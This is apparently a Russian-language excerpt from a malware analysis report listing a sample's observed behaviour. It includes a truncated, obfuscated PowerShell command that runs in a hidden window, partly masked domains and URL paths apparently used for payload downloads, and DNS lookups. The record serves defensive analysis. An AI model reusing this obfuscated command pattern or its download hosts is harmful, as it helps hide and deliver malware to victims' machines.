Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $ENv:coMspec[4,26,25]-jOIn'') ( "$( SeT-iteM 'VaRIaBLE:ofs' '') " + [sTRiNg]('54m113g71T90}101}126a113Z50}47U50<124U119a101U63<125Z112Z120m119<113{102m50Z96}115<124g118a125b127b41g54T123g84...
- 'ab###.#ntvchannel.com':80
- 'cn###ctor.com':80
- 'sk####eacademy.com':80
- 'hu###omains.com':443
- http://www.cn###ctor.com/VIN1Uyetqb/
- http://sk####eacademy.com/Data/lRrEe02i/
- 'hu###omains.com':443
- DNS ASK ab###.#ntvchannel.com
- DNS ASK cn###ctor.com
- DNS ASK sk####eacademy.com
- DNS ASK hu###omains.com
- DNS ASK sc####dro.com.br
- DNS ASK ke####baotin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $ENv:coMspec[4,26,25]-jOIn'') ( "$( SeT-iteM 'VaRIaBLE:ofs' '') " + [sTRiNg]('54m113g71T90}101}126a113Z50}47U50<124U119a101U63<125Z112Z120m119<113{102m50Z96}115<124g118a125b127b41g54T123g84...' (со скрытым окном)